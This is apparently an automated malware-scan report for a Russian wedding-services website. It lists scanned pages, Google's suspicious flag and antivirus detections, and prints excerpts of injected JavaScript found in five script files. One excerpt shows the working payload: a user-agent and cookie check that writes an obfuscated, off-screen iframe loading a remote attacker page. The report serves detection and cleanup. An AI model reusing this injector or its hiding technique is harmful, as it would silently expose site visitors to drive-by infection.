New scan:

Malware Scanner report for art-sharmel.ru

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "art-sharmel.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=art-sharmel.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.art-sharmel.ru/
200 OK
Content-Length: 21871
Content-Type: text/html
clean
http://www.art-sharmel.ru/media/system/js/caption.js
200 OK
Content-Length: 7942
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (p_haystack, p_needle, p_offset) {
var shed = (p_haystack + '').toLowerCase();
var chine = (p_needle + '').toLowerCase();
var index = 0;
if ((index = shed.indexOf(chine, p_offset)) !== -1) {
return index;
}

return false;
}
function Browser(){
var Enumeration = 'iPhone|Macintosh|Linux|iPad|Android|FreeBSD|Chrome|IEMobile|Mini|Firefox';
Enumeration = Enumeration.split('|');
var Taboo = false;

... 3731 bytes are skipped ...
Child(element);
if ( element.title != "" ) {
container.appendChild(text);
}
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI

http://www.art-sharmel.ru/templates/pari5/jquery.js
200 OK
Content-Length: 5970
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (p_haystack, p_needle, p_offset) {
var shed = (p_haystack + '').toLowerCase();
var chine = (p_needle + '').toLowerCase();
var index = 0;
if ((index = shed.indexOf(chine, p_offset)) !== -1) {
return index;
}

return false;
}
function Browser(){
var Enumeration = 'iPhone|Macintosh|Linux|iPad|Android|FreeBSD|Chrome|IEMobile|Mini|Firefox';
Enumeration = Enumeration.split('|');
var Taboo = false;

... 2301 bytes are skipped ...
d;
}
if (!see_user_agent()) {
var cookie = getCookie('gelent1s7dsayvagen58a');
if (cookie == undefined) {
setCookie('gelent1s7dsayvagen58a', true, 259200);
document.write('<i'+'f'+'r'+'a'+'m'+'e s'+'rc'+'='+'"http://pasta.wulabs.org/gfdfceretrhtdrhjyj12.html" style="position'+':'+'ab'+'so'+'lute'+';'+'left'+':'+'-'+'1155'+'px'+';'+'top'+':'+'-'+'1155'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'f'+'r'+'a'+'me'+'>');
}
};
})();

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI

http://www.art-sharmel.ru/templates/pari5/script.js
200 OK
Content-Length: 16516
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (p_haystack, p_needle, p_offset) {
var shed = (p_haystack + '').toLowerCase();
var chine = (p_needle + '').toLowerCase();
var index = 0;
if ((index = shed.indexOf(chine, p_offset)) !== -1) {
return index;
}

return false;
}
function Browser(){
var Enumeration = 'iPhone|Macintosh|Linux|iPad|Android|FreeBSD|Chrome|IEMobile|Mini|Firefox';
Enumeration = Enumeration.split('|');
var Taboo = false;

... 3452 bytes are skipped ...
unction () { var b = jQuery(this); b.parent().removeClass("hover"); if (!b.hasClass('active')) b.parent().addClass('active'); });
b.mouseup(function () { var b = jQuery(this); if (!b.hasClass('active')) b.parent().removeClass('active'); });
});
}
jQuery(function() { artButtonSetup("art-button"); });





jQuery(function() {
artButtonSetup("button");
artButtonSetup("readon");
artButtonSetup("readmore");
});;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen

http://www.art-sharmel.ru/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject.js
200 OK
Content-Length: 12859
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (p_haystack, p_needle, p_offset) {
var shed = (p_haystack + '').toLowerCase();
var chine = (p_needle + '').toLowerCase();
var index = 0;
if ((index = shed.indexOf(chine, p_offset)) !== -1) {
return index;
}

return false;
}
function Browser(){
var Enumeration = 'iPhone|Macintosh|Linux|iPad|Android|FreeBSD|Chrome|IEMobile|Mini|Firefox';
Enumeration = Enumeration.split('|');
var Taboo = false;

... 3273 bytes are skipped ...
function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen

http://www.art-sharmel.ru/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject_addon.js
200 OK
Content-Length: 6818
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (p_haystack, p_needle, p_offset) {
var shed = (p_haystack + '').toLowerCase();
var chine = (p_needle + '').toLowerCase();
var index = 0;
if ((index = shed.indexOf(chine, p_offset)) !== -1) {
return index;
}

return false;
}
function Browser(){
var Enumeration = 'iPhone|Macintosh|Linux|iPad|Android|FreeBSD|Chrome|IEMobile|Mini|Firefox';
Enumeration = Enumeration.split('|');
var Taboo = false;

... 3219 bytes are skipped ...
erCase().indexOf('safari') != -1,
isAX = typeof window.ActiveXObject != "undefined";

if(isAX && !isSafari) {
var fobjs = {}, init = false;

function writeSWFObject() {
so.write(container);
document.getElementById(container).style.visibility="visible";
}

document.getElementById(container).style.visibility="hidden";
jsnAddEvent(window, "load", writeSWFObject);
} else {
so.write(container);
}
};;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Microsoft
Trojan:JS/Iframe.DI

http://www.art-sharmel.ru/organizacija-svadeb
200 OK
Content-Length: 21211
Content-Type: text/html
clean
http://www.art-sharmel.ru/organizacija-svadeb/oformlenie-svadby
200 OK
Content-Length: 18496
Content-Type: text/html
clean
http://www.art-sharmel.ru/organizacija-svadeb/dekor-fotosessij
200 OK
Content-Length: 13967
Content-Type: text/html
clean
http://www.art-sharmel.ru/organizacija-svadeb/floristika
200 OK
Content-Length: 14469
Content-Type: text/html
clean
http://www.art-sharmel.ru/organizacija-svadeb/vyezdnaja-registracija
200 OK
Content-Length: 37831
Content-Type: text/html
clean
http://www.art-sharmel.ru/prajs
200 OK
Content-Length: 17908
Content-Type: text/html
clean
http://www.art-sharmel.ru/idei
200 OK
Content-Length: 14078
Content-Type: text/html
clean
http://www.art-sharmel.ru/idei/fruktovye-svadby
200 OK
Content-Length: 16453
Content-Type: text/html
clean
http://www.art-sharmel.ru/idei/fruktovye-svadby/limonnaja
200 OK
Content-Length: 43789
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: art-sharmel.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: art-sharmel.ru
Referer: http://www.google.com/search?q=art-sharmel.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.